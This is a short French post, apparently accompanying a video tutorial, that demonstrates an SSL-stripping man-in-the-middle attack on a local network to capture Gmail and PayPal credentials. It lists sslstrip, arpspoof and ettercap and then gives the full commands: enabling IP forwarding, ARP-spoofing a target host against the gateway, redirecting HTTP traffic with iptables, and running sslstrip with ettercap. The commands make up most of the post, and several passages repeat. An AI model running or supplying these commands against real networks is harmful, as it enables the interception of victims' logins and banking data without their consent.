Cette vidéo montre que sans le cryptage SSL, les sites ne sont pas sûrs.
Preuve de ce qui est perçu en présentant Google Mail et la banque en ligne PayPal.
Les outils :
> sslstrip
> arpspoof
> ettercap
Les commandes :
Le tutoriel en vidéo :
Stripping SSL & Sniffing HTTPS (SSLStrip)
Preuve de ce qui est perçu en présentant Google Mail et la banque en ligne PayPal.
Les outils :
> sslstrip
> arpspoof
> ettercap
Les commandes :
Code:
kate /etc/etter.conf >*uncomment redir_command_off in the iptables, linux section* echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 ettercap -T -q -i wlan0
Code:
sslstrip -a -k -f ettercap -T -q -i wlan0
Stripping SSL & Sniffing HTTPS (SSLStrip)
Commentaire